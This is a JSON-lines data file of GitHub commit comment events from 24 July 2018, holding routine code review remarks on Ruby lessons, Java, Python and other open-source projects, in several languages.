{"id":"8012652068","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29819754,"position":205,"line":205,"path":"Lesson_4/lib/main_menu.rb","commit_id":"246f26a5cc7117943b41d5c72a11995be203fe3a","created_at":"2018-07-24T20:43:14Z","updated_at":"2018-07-24T20:43:14Z","author_association":"NONE","body":"здесь и в аналогичном методе для поезда лушче использовать другие варианты кода\r\nнапример есть метод [detect](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-detect)\r\nон возвращает объект или \"нил\", если объект не найден\r\nесли написать `!!` перед результатом, который вернет этот метод, то \"нил\" пробразуется в \"фолс\", а объек в \"тру\", т.е функциональность будет та же, но в одну строчку\r\n\r\n"}},"created_at":"2018-07-24T20:43:14Z"}
{"id":"8012653616","type":"CommitCommentEvent","actor":{"login":"jevanjones"},"repo":{"name":"jholtom/PICS"},"payload":{"comment":{"id":29819760,"position":null,"line":null,"path":null,"commit_id":"3e9dd62d31d58d1c36ed7be8ec0cd16c67802b6d","created_at":"2018-07-24T20:43:33Z","updated_at":"2018-07-24T20:43:33Z","author_association":"NONE","body":"This is a hanging curly brace. The if statement with hrd.reply, if it proves false, will not jump the code to here, but will run through the rest of the code, without the reply_buffer having been created. Building currently fails"}},"created_at":"2018-07-24T20:43:33Z"}
{"id":"8012656269","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29819765,"position":13,"line":13,"path":"Lesson_4/lib/main_menu.rb","commit_id":"246f26a5cc7117943b41d5c72a11995be203fe3a","created_at":"2018-07-24T20:44:05Z","updated_at":"2018-07-24T20:44:05Z","author_association":"NONE","body":"здесь наверное не хватает переменных для маршрунтов и для вагонов"}},"created_at":"2018-07-24T20:44:05Z"}
{"id":"8012656314","type":"CommitCommentEvent","actor":{"login":"fengxue-IS"},"repo":{"name":"eclipse/openj9"},"payload":{"comment":{"id":29819766,"position":null,"line":null,"path":null,"commit_id":"281545a7f56c0443f08715d99571c59072b399e0","created_at":"2018-07-24T20:44:06Z","updated_at":"2018-07-24T20:44:06Z","author_association":"CONTRIBUTOR","body":"adding this to test if the problem I am seeing is caused by the wrapper sendTarget function"}},"created_at":"2018-07-24T20:44:06Z"}
{"id":"8012657198","type":"CommitCommentEvent","actor":{"login":"talsafran"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29819768,"position":null,"line":null,"path":null,"commit_id":"820ed07e8bc5940679b8e5f8febac324effb5822","created_at":"2018-07-24T20:44:17Z","updated_at":"2018-07-24T20:44:17Z","author_association":"MEMBER","body":"@Mohameday3393 looks like it's related to Indonesian translation! See #545"}},"created_at":"2018-07-24T20:44:17Z"}
{"id":"8012672005","type":"CommitCommentEvent","actor":{"login":"mweirauch"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29819804,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T20:47:18Z","updated_at":"2018-07-24T20:47:18Z","author_association":"COLLABORATOR","body":"I am regularly checking updated versions, but I apparently missed updating PushGateway. Was still using `prom/pushgateway:v0.4.0` and this one doesn't exhibit the problem. Starting with `prom/pushgateway:v0.5.0` and onwards the problem arises. As a quick solution, I'd propose to downgrade in the meantime. (Assume there'll be no flags changing this behaviour back in PushGateway.)"}},"created_at":"2018-07-24T20:47:18Z"}
{"id":"8012683302","type":"CommitCommentEvent","actor":{"login":"Freddo3000"},"repo":{"name":"Sniperhid/1tac_misc"},"payload":{"comment":{"id":29819832,"position":null,"line":null,"path":null,"commit_id":"83eb16691b0b66576ae7eb7198d8b99598c6e6ba","created_at":"2018-07-24T20:49:33Z","updated_at":"2018-07-24T20:49:33Z","author_association":"CONTRIBUTOR","body":"Generic Paramilitary Desert does not have \"default goggles. The khaki/sand headgear may fit better with the camo."}},"created_at":"2018-07-24T20:49:33Z"}
{"id":"8012683996","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"wildfly/wildfly-proposals"},"payload":{"comment":{"id":29819835,"position":55,"line":55,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"40fc139ccae3200b51f9379dd27a1e1de9a8dcdf","created_at":"2018-07-24T20:49:41Z","updated_at":"2018-07-24T20:49:41Z","author_association":"CONTRIBUTOR","body":"Need to mention that the new management operation will be documented in the WildFly documentation. You can check which section to mention here: https://github.com/wildfly/wildfly/tree/master/docs/src/main/asciidoc/_elytron (probably Using the Elytron subsystem will be a good section to add to)"}},"created_at":"2018-07-24T20:49:41Z"}
{"id":"8012686428","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/srax-front-test"},"payload":{"comment":{"id":29819843,"position":null,"line":null,"path":null,"commit_id":"8c642e47be535bf4c3f2d192ee683fcf2b5fde62","created_at":"2018-07-24T20:50:09Z","updated_at":"2018-07-24T20:50:09Z","author_association":"OWNER","body":"![screen shot 2018-07-24 at 3 48 43 pm](https://user-images.githubusercontent.com/13053013/43165325-3cfa2e4a-8f59-11e8-80e2-2638b716f44d.png)\r\n"}},"created_at":"2018-07-24T20:50:09Z"}
{"id":"8012686888","type":"CommitCommentEvent","actor":{"login":"OzzieOrca"},"repo":{"name":"CruGlobal/missionhub-web"},"payload":{"comment":{"id":29819848,"position":4,"line":54,"path":"app/assets/javascripts/angular/components/surveyOverviewSettingsTab/surveyOverviewSettings.component.js","commit_id":"40f5a653cb92d84e52bfe5b6e03bf34151227e76","created_at":"2018-07-24T20:50:14Z","updated_at":"2018-07-24T20:50:14Z","author_association":"CONTRIBUTOR","body":"Doing `// eslint-disable-next-line angular/document-service` would be more specific and still catch other potential errors on that line."}},"created_at":"2018-07-24T20:50:14Z"}
{"id":"8012688982","type":"CommitCommentEvent","actor":{"login":"thess"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29819856,"position":null,"line":null,"path":null,"commit_id":"2cedae0aa9befe1135c83f007942d89ec906658e","created_at":"2018-07-24T20:50:38Z","updated_at":"2018-07-24T20:50:38Z","author_association":"MEMBER","body":"Without more information about your setup (platform, packages, etc.), I going to assume you have ffmpeg-audio-dec installed. As the name suggests, this package is audio decoders. If you want the encoders, you need to have installed libffmpeg-full before MPD (or, force removal libffmpeg-audio-dec and install libffmpeg-full).\r\n\r\nIf this is not the case - please open an issue in the repo under __Issues__ AND, supply a better description of your environment, and the output of __mpd --version__ "}},"created_at":"2018-07-24T20:50:38Z"}
{"id":"8012699080","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/myrubyblog"},"payload":{"comment":{"id":29819879,"position":8,"line":9,"path":"app/controllers/posts_controller.rb","commit_id":"b9e77690bdafa4c10a2415afb8383474ac517e13","created_at":"2018-07-24T20:52:38Z","updated_at":"2018-07-24T20:52:38Z","author_association":"NONE","body":"Remover esse `puts`"}},"created_at":"2018-07-24T20:52:38Z"}
{"id":"8012700741","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/myrubyblog"},"payload":{"comment":{"id":29819887,"position":11,"line":12,"path":"app/controllers/posts_controller.rb","commit_id":"b9e77690bdafa4c10a2415afb8383474ac517e13","created_at":"2018-07-24T20:52:57Z","updated_at":"2018-07-24T20:52:57Z","author_association":"NONE","body":"Indentar essa linha"}},"created_at":"2018-07-24T20:52:57Z"}
{"id":"8012700888","type":"CommitCommentEvent","actor":{"login":"jimklimov"},"repo":{"name":"42ity/fty-rest"},"payload":{"comment":{"id":29819888,"position":4,"line":106,"path":"src/web/src/time.ecpp","commit_id":"ef28c78b1030508905b4789dc785b4f268ddbb7a","created_at":"2018-07-24T20:52:59Z","updated_at":"2018-07-24T20:52:59Z","author_association":"MEMBER","body":"Note that when time is set from value provided by the user just after POSTing the request, it is likely to set the proper value more or less precisely. Moving this below, we add a random latency of service management that can take quite a while...\r\n\r\nI guess in this case the server should time how long it has spent in processing the call, and add this value to time provided by the user to keep the system clock relatively correct."}},"created_at":"2018-07-24T20:52:59Z"}
{"id":"8012702810","type":"CommitCommentEvent","actor":{"login":"untuned"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29819893,"position":null,"line":null,"path":null,"commit_id":"bfefebe480c7853bedebdae02b420edff52c764b","created_at":"2018-07-24T20:53:22Z","updated_at":"2018-07-24T20:53:22Z","author_association":"NONE","body":"admins actually know when i use /warn now\r\ncool"}},"created_at":"2018-07-24T20:53:22Z"}
{"id":"8012704418","type":"CommitCommentEvent","actor":{"login":"adrianbg"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819900,"position":38,"line":51,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T20:53:41Z","updated_at":"2018-07-24T20:53:41Z","author_association":"CONTRIBUTOR","body":"pytorch has a large number of tensor types. just comparing to torch.Tensor isn't going to cut it"}},"created_at":"2018-07-24T20:53:41Z"}
{"id":"8012707179","type":"CommitCommentEvent","actor":{"login":"tacosundae"},"repo":{"name":"stumpwm/stumpwm"},"payload":{"comment":{"id":29819906,"position":null,"line":null,"path":null,"commit_id":"55e3b9f1527148a66168867eaa51acfd6c8d0925","created_at":"2018-07-24T20:54:12Z","updated_at":"2018-07-24T20:54:12Z","author_association":"NONE","body":"This drastically widens the scope of this command. I suggest that this should be a whole new command or that the previous behavior be added as another command. I almost never want to balance all frames in the tree, rather balance the frames in a particular split. I do like the properties of the binary tree layout though."}},"created_at":"2018-07-24T20:54:12Z"}
{"id":"8012707467","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"wildfly/wildfly-proposals"},"payload":{"comment":{"id":29819907,"position":41,"line":41,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"40fc139ccae3200b51f9379dd27a1e1de9a8dcdf","created_at":"2018-07-24T20:54:16Z","updated_at":"2018-07-24T20:54:16Z","author_association":"CONTRIBUTOR","body":"Minor nits:\r\n\r\n-instead of \"exposing\", it's better to say \"adding\"\r\n-instead of \"for Elytron's ldap-key-store\", it's better to say \"to the Elytron subsystem's ldap-key-store resource\""}},"created_at":"2018-07-24T20:54:16Z"}
{"id":"8012711800","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"wildfly/wildfly-proposals"},"payload":{"comment":{"id":29819921,"position":44,"line":44,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"40fc139ccae3200b51f9379dd27a1e1de9a8dcdf","created_at":"2018-07-24T20:55:08Z","updated_at":"2018-07-24T20:55:08Z","author_association":"CONTRIBUTOR","body":"should use something like LDAP_KEY_STORE_NAME instead of LKS1"}},"created_at":"2018-07-24T20:55:08Z"}
{"id":"8012713616","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29819924,"position":13,"line":13,"path":"Lesson_4/lib/main_menu.rb","commit_id":"246f26a5cc7117943b41d5c72a11995be203fe3a","created_at":"2018-07-24T20:55:29Z","updated_at":"2018-07-24T20:55:29Z","author_association":"NONE","body":"и общее замечание по логике приложения - получается что маршруты как таковые не существуют в текущей версии приложения\r\nони существуют только в привязке к поезду и у разных позедов могуть быть маршруты с одинаковыми станциями, но это будут разные объекты\r\nнужно это поправить в сторону независимости объета маршрут от поезда\r\nдургими словами пункт меню \"Маршруты\" должен быть доступен в корне, вместе с поездами и станциями\r\nи создавать маршрут должна быть возможность независимо от поезда\r\nчтобы потом можно было один и тот же маршрут присвоить разным поездам, без его повторного создания"}},"created_at":"2018-07-24T20:55:29Z"}
{"id":"8012714344","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"wildfly/wildfly-proposals"},"payload":{"comment":{"id":29819925,"position":41,"line":41,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"40fc139ccae3200b51f9379dd27a1e1de9a8dcdf","created_at":"2018-07-24T20:55:37Z","updated_at":"2018-07-24T20:55:37Z","author_association":"CONTRIBUTOR","body":"Should mention that the new management operation won't take any parameters"}},"created_at":"2018-07-24T20:55:37Z"}
{"id":"8012717110","type":"CommitCommentEvent","actor":{"login":"DCurrent"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29819932,"position":null,"line":null,"path":null,"commit_id":"d5e140bb520abcf8c55fed43c53ab8a555dcdb41","created_at":"2018-07-24T20:56:10Z","updated_at":"2018-07-24T20:56:10Z","author_association":"OWNER","body":"@whitedragon0000 I thought we had come to an understanding, and then I find you once again ignoring my wishes. I've asked you leave property access alone several times, and also to quit adding constants to openbor.h - you are following an outdated design I'm neither using nor allowing, and in the process just making a bigger mess for me to clean up. If you continue to do this, I will revoke your contribution rights completely."}},"created_at":"2018-07-24T20:56:10Z"}
{"id":"8012719034","type":"CommitCommentEvent","actor":{"login":"mollyfish"},"repo":{"name":"thetravisw/10-album-art-server"},"payload":{"comment":{"id":29819937,"position":24,"line":24,"path":"src/main/java/HTTPRequest.java","commit_id":"796f363098539b97e535fcc0119b819eb5920198","created_at":"2018-07-24T20:56:33Z","updated_at":"2018-07-24T20:56:33Z","author_association":"NONE","body":"`this.path` is misconfigured and will not return `index.html` for me (look at your slashes and make sure you are building your filepath correctly)"}},"created_at":"2018-07-24T20:56:33Z"}
{"id":"8012719712","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29819941,"position":2,"line":2,"path":"area-triagle.rb","commit_id":"8e098d57578db126d074600926af96e17ea78c4d","created_at":"2018-07-24T20:56:42Z","updated_at":"2018-07-24T20:56:42Z","author_association":"NONE","body":"Копирую с предыдущего ревью:\r\n\r\nVladFiliucov 6 days ago\r\nЗначение могут быть не целыми. Нужно использовать to_f, потому-что может выйти не правильный результат при делении\r\n```\r\n2.5.0 :002 > 3 / 2\r\n => 1\r\n2.5.0 :003 > 3.to_f / 2\r\n => 1.5\r\n2.5.0 :004 >\r\n```"}},"created_at":"2018-07-24T20:56:42Z"}
{"id":"8012719847","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29819943,"position":13,"line":13,"path":"Lesson_4/lib/main_menu.rb","commit_id":"246f26a5cc7117943b41d5c72a11995be203fe3a","created_at":"2018-07-24T20:56:43Z","updated_at":"2018-07-24T20:56:43Z","author_association":"NONE","body":"аналогично с вагонами, правлиьно будет дать возможность объектам класса вагон существовать и вне поезда\r\nт.е. при отцеплении от поезда он должен существование свое прдолжать"}},"created_at":"2018-07-24T20:56:43Z"}
{"id":"8012722912","type":"CommitCommentEvent","actor":{"login":"mollyfish"},"repo":{"name":"thetravisw/10-album-art-server"},"payload":{"comment":{"id":29819956,"position":46,"line":46,"path":"src/main/java/HTTPRequest.java","commit_id":"796f363098539b97e535fcc0119b819eb5920198","created_at":"2018-07-24T20:57:19Z","updated_at":"2018-07-24T20:57:19Z","author_association":"NONE","body":"`params` has a size of zero when it is returned, which breaks the program"}},"created_at":"2018-07-24T20:57:19Z"}
{"id":"8012723095","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"wildfly/wildfly-proposals"},"payload":{"comment":{"id":29819957,"position":41,"line":41,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"40fc139ccae3200b51f9379dd27a1e1de9a8dcdf","created_at":"2018-07-24T20:57:22Z","updated_at":"2018-07-24T20:57:22Z","author_association":"CONTRIBUTOR","body":"Should mention what you think should happen for filtering-key-store"}},"created_at":"2018-07-24T20:57:22Z"}
{"id":"8012724793","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"DDMAL/CMN-MEI_to_MensuralMEI_Translator"},"payload":{"comment":{"id":29819967,"position":null,"line":null,"path":null,"commit_id":"641f03a53f654f8f368cc2bee9a969bfaf0e9788","created_at":"2018-07-24T20:57:43Z","updated_at":"2018-07-24T20:57:43Z","author_association":"COLLABORATOR","body":"Currently, Ars Nova would work (and does work) perfectly. But Ars Antiqua and White Notation would be broken, because of the new way in which the mensuration information is entered. I have to change these two modules to work with this information the same way I did for the Ars Nova.\r\n\r\nAnd I also have to include the handling of 'partial imperfection at both sides' in these two modules (which I already included for Ars Nova, the 4/6 fraction and the reverse in the if-statements order).\r\n\r\nFinally, I should test that the inclusion of these characteristics won't break anything and the pieces will work perfectly (the ones that worked before and the new ones for which the 'change in mensuration' handling was included)"}},"created_at":"2018-07-24T20:57:43Z"}
{"id":"8012724927","type":"CommitCommentEvent","actor":{"login":"vanpelt"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819968,"position":38,"line":51,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T20:57:44Z","updated_at":"2018-07-24T20:57:44Z","author_association":"CONTRIBUTOR","body":"Yeah, I'm thinking this will be a rare case.  I'm hoping users set summary items to numpy arrays.  Maybe we just make `fullname` more clever to normalize the name?"}},"created_at":"2018-07-24T20:57:44Z"}
{"id":"8012726125","type":"CommitCommentEvent","actor":{"login":"vanpelt"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819972,"position":37,"line":50,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T20:57:59Z","updated_at":"2018-07-24T20:57:59Z","author_association":"CONTRIBUTOR","body":"Makes sense, should have written a test for that case... Should be good now."}},"created_at":"2018-07-24T20:57:59Z"}
{"id":"8012735156","type":"CommitCommentEvent","actor":{"login":"slashP"},"repo":{"name":"slashP/vinmonopolet"},"payload":{"comment":{"id":29819990,"position":null,"line":null,"path":null,"commit_id":"0516985ad23a6da03dc2b22c25c33828eb2b3d3a","created_at":"2018-07-24T20:59:49Z","updated_at":"2018-07-24T20:59:49Z","author_association":"OWNER","body":"Probably shouldn't have the secrets in here in clear text? 😃"}},"created_at":"2018-07-24T20:59:49Z"}
{"id":"8012736881","type":"CommitCommentEvent","actor":{"login":"enovella"},"repo":{"name":"b-mueller/frida-detection-demo"},"payload":{"comment":{"id":29819998,"position":null,"line":null,"path":null,"commit_id":"0e3f3df4b99bb3fd1b3d49e1c8b0ac7620a401e3","created_at":"2018-07-24T21:00:10Z","updated_at":"2018-07-24T21:00:10Z","author_association":"CONTRIBUTOR","body":"Why are you remarking this in this way? Anyone claiming that this super-fancy-mega-cool code is unbeatable or something?"}},"created_at":"2018-07-24T21:00:10Z"}
{"id":"8012737869","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29820008,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T21:00:20Z","updated_at":"2018-07-24T21:00:20Z","author_association":"COLLABORATOR","body":"Yes, it's very helpful, I'll do my best to implement this :)."}},"created_at":"2018-07-24T21:00:20Z"}
{"id":"8012741460","type":"CommitCommentEvent","actor":{"login":"codyb29"},"repo":{"name":"codyb29/HEA"},"payload":{"comment":{"id":29820018,"position":null,"line":null,"path":null,"commit_id":"8b537c3e0131299f8cd8a63749eb0a2b4e0459aa","created_at":"2018-07-24T21:01:01Z","updated_at":"2018-07-24T21:01:01Z","author_association":"OWNER","body":"Still needs solid testing but looks to be working fine right now."}},"created_at":"2018-07-24T21:01:01Z"}
{"id":"8012741527","type":"CommitCommentEvent","actor":{"login":"pbslavin"},"repo":{"name":"pbslavin/WebApplication2"},"payload":{"comment":{"id":29820019,"position":2,"line":2,"path":"WebApplication2/Views/_ViewStart.cshtml","commit_id":"fd8cd0d37bfabe741eea4eabd177537f5f3634bd","created_at":"2018-07-24T21:01:02Z","updated_at":"2018-07-24T21:01:02Z","author_association":"OWNER","body":"Well, I improved it slightly by making the minute a variable, so that it could be set in that file to any integer; but you probably meant more testing than just that the modulo logic worked (which was trivial).\n\nSent from Mail for Windows 10\n\nFrom: daniefer\nSent: Tuesday, July 24, 2018 2:57 PM\nTo: pbslavin/WebApplication2\nCc: pbslavin; Author\nSubject: Re: [pbslavin/WebApplication2] Add project files. (fd8cd0d)\n\nIf you wanted to test that your page switched between views, how could you write this logic so that you don't have to wait 2 minutes for the clock to tick to an even and then odd minute?\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2018-07-24T21:01:02Z"}
{"id":"8012747509","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820027,"position":4,"line":4,"path":"area-triagle.rb","commit_id":"8e098d57578db126d074600926af96e17ea78c4d","created_at":"2018-07-24T21:02:15Z","updated_at":"2018-07-24T21:02:15Z","author_association":"NONE","body":"Сразу привыкаем давать переменным и методам говорящие имена. Это упрощает понимание намерения кода. В этом задании лучше вместо a, h, s использовать base, height, square. Это лучше отразит \"намерение\" кода"}},"created_at":"2018-07-24T21:02:15Z"}
{"id":"8012748099","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29820028,"position":null,"line":null,"path":null,"commit_id":"2f43898086941d7ee1d5608b12eb5c1ce9d36708","created_at":"2018-07-24T21:02:22Z","updated_at":"2018-07-24T21:02:22Z","author_association":"NONE","body":"> I have completed the CSS testing on the Zpages, and am ready to submit a PR? Or would you like me to wait until the CSS_PATH issue is resolved?\r\n\r\nYes, I think you can go ahead and submit a PR first. However can you add the css file only (and don't remove the `emitStyle()` method) at this moment? I'm just afraid the incorrect css path could break users' zpages.\r\n\r\n> In my latest attempt I wanted to assign the value of CSS_PATH to the sourceSets but the gradle build failed. Done correctly, might this be a possibility?\r\n\r\nThat could be one possibility. I think the important thing here is to make sure the css file is properly set in the released jar files, and that might be different from local build. I'm still experimenting too."}},"created_at":"2018-07-24T21:02:22Z"}
{"id":"8012748413","type":"CommitCommentEvent","actor":{"login":"balsoft"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29820029,"position":3,"line":3,"path":"pkgs/applications/office/libreoffice/wrapper.sh","commit_id":"95a819c0026a7a3c0dd2099e1c53fea95430c505","created_at":"2018-07-24T21:02:26Z","updated_at":"2018-07-24T21:02:26Z","author_association":"NONE","body":"Actually, just setting `SAL_USE_VCLPLUGIN=auto` seems to work! Maybe that's what should be done?"}},"created_at":"2018-07-24T21:02:26Z"}
{"id":"8012751351","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820034,"position":5,"line":5,"path":"area-triagle.rb","commit_id":"8e098d57578db126d074600926af96e17ea78c4d","created_at":"2018-07-24T21:02:59Z","updated_at":"2018-07-24T21:02:59Z","author_association":"NONE","body":"вокруг оператора умножения нужны пробелы"}},"created_at":"2018-07-24T21:02:59Z"}
{"id":"8012752787","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29820038,"position":5,"line":33,"path":"lbrynet/daemon/DaemonServer.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-24T21:03:16Z","updated_at":"2018-07-24T21:03:16Z","author_association":"MEMBER","body":"I checked a stackoverflow answer for this, in which twisted in python3 requires this to be byte"}},"created_at":"2018-07-24T21:03:16Z"}
{"id":"8012754214","type":"CommitCommentEvent","actor":{"login":"hackrush01"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29820041,"position":5,"line":33,"path":"lbrynet/daemon/DaemonServer.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-24T21:03:33Z","updated_at":"2018-07-24T21:03:33Z","author_association":"MEMBER","body":"I can find the documentaion/stackoverflow answer if needed"}},"created_at":"2018-07-24T21:03:33Z"}
{"id":"8012755061","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29820042,"position":5,"line":5,"path":"area-triagle.rb","commit_id":"8e098d57578db126d074600926af96e17ea78c4d","created_at":"2018-07-24T21:03:43Z","updated_at":"2018-07-24T21:03:43Z","author_association":"NONE","body":"скобки тут не нужны. У операторов одинаковый приоритет, так-что вычисления будут производиться с лева на право"}},"created_at":"2018-07-24T21:03:43Z"}
{"id":"8012759336","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29820046,"position":null,"line":null,"path":null,"commit_id":"fce1503791d9bbf5b3f706fe92b5ccf29d9e9377","created_at":"2018-07-24T21:04:37Z","updated_at":"2018-07-24T21:04:37Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-274](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-274).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-274-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T21:04:37Z"}
{"id":"8012761986","type":"CommitCommentEvent","actor":{"login":"adrianbg"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29820051,"position":38,"line":51,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T21:05:10Z","updated_at":"2018-07-24T21:05:10Z","author_association":"CONTRIBUTOR","body":"Here's how I did it in my fix. Untested but I believe it'll work. TBH, I'm not a fan of the type normalization, especially since the function is called `fullname` when it really isn't.\r\n\r\n```python\r\ndef is_pytorch_tensor_typename(type_name):\r\n    return 'torch' in type_name and 'Tensor' in type_name\r\n```"}},"created_at":"2018-07-24T21:05:10Z"}
{"id":"8012764541","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"GZR-Kernels/kernel_oneplus_msm8998"},"payload":{"comment":{"id":29820056,"position":null,"line":null,"path":null,"commit_id":"bf8ae173eda3f4634af60c8dc1c9f706ed6f0fb0","created_at":"2018-07-24T21:05:41Z","updated_at":"2018-07-24T21:05:41Z","author_association":"MEMBER","body":"lol\r\n"}},"created_at":"2018-07-24T21:05:41Z"}
{"id":"8012767255","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29820061,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T21:06:18Z","updated_at":"2018-07-24T21:06:18Z","author_association":"CONTRIBUTOR","body":"I guess it depends on light source/fixture type:\r\n1. fixtures with white light source (either LED or bulb) adn *real* color wheels have subtractive color mixing:\r\n  you start with white light and you subtract any color filter that is inserted in the light path.\r\n  In case of AlphaBeam, L17 should be \"Open\", meaning at that position there is no filter, the light stays white.\r\n  C filters red light (C = G+B, i.e. passes only green and blue), M filters G, Y filters B.\r\n  White source + 70% C = R @30%, G @100%, B@100%\r\n  White source + 70% C + Blue = B@100%\r\n2. fixtures with RGB(AW...) LEDS with no hw filters on the LEDs depend purely on the firmware\r\n3. fixtures with RGB(AW...) LEDs with hw filters (wheels) are similar to 1., but start with RGB(AW..) light instead of white one. These are rare currently (I don't understand why... RGB source + gobos + prism + focus could make a nice fixture)\r\n\r\nIdeally, there should be a setting in the fixture definition. You can guess something:\r\n- if the fixture has incadescent & co. lamp, odd are it's type 1.\r\n- if the fixture has RGB source, it's type 2\r\n- white LED source: spots/beams/hybrids are type 1, washes are type 2.\r\n\r\nI was looking how GDTF solves this but got lost a bit. https://gdtf-share.com/wiki/GDTF_File_Description\r\nPerhaps it's sowhere here:\r\n- https://gdtf-share.com/wiki/GDTF_File_Description#Emitters"}},"created_at":"2018-07-24T21:06:18Z"}
{"id":"8012769762","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29820065,"position":null,"line":null,"path":null,"commit_id":"252597e09f0b914b553e06853f0768d2450434e7","created_at":"2018-07-24T21:06:49Z","updated_at":"2018-07-24T21:06:49Z","author_association":"COLLABORATOR","body":"<h3>[Checkbox] revert to padding/margin (#2720)</h3>\n\nPreview: <strong><a href='https://19053-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19053-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19053-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-24T21:06:49Z"}
{"id":"8012772125","type":"CommitCommentEvent","actor":{"login":"Duality-CDOO"},"repo":{"name":"duality-solutions/Dynamic"},"payload":{"comment":{"id":29820068,"position":53,"line":78,"path":"src/directory.h","commit_id":"b55deaa5d05a1aa380360a40645fb8eed4a7cd88","created_at":"2018-07-24T21:07:20Z","updated_at":"2018-07-24T21:07:20Z","author_association":"CONTRIBUTOR","body":"What happened to version 2? :P"}},"created_at":"2018-07-24T21:07:20Z"}
{"id":"8012772633","type":"CommitCommentEvent","actor":{"login":"janpaki"},"repo":{"name":"janpaki/webspolite"},"payload":{"comment":{"id":29820070,"position":null,"line":null,"path":null,"commit_id":"9677c31a44646bc298edc2b041fc15df3cbc2523","created_at":"2018-07-24T21:07:26Z","updated_at":"2018-07-24T21:07:26Z","author_association":"OWNER","body":"Hello Master"}},"created_at":"2018-07-24T21:07:26Z"}
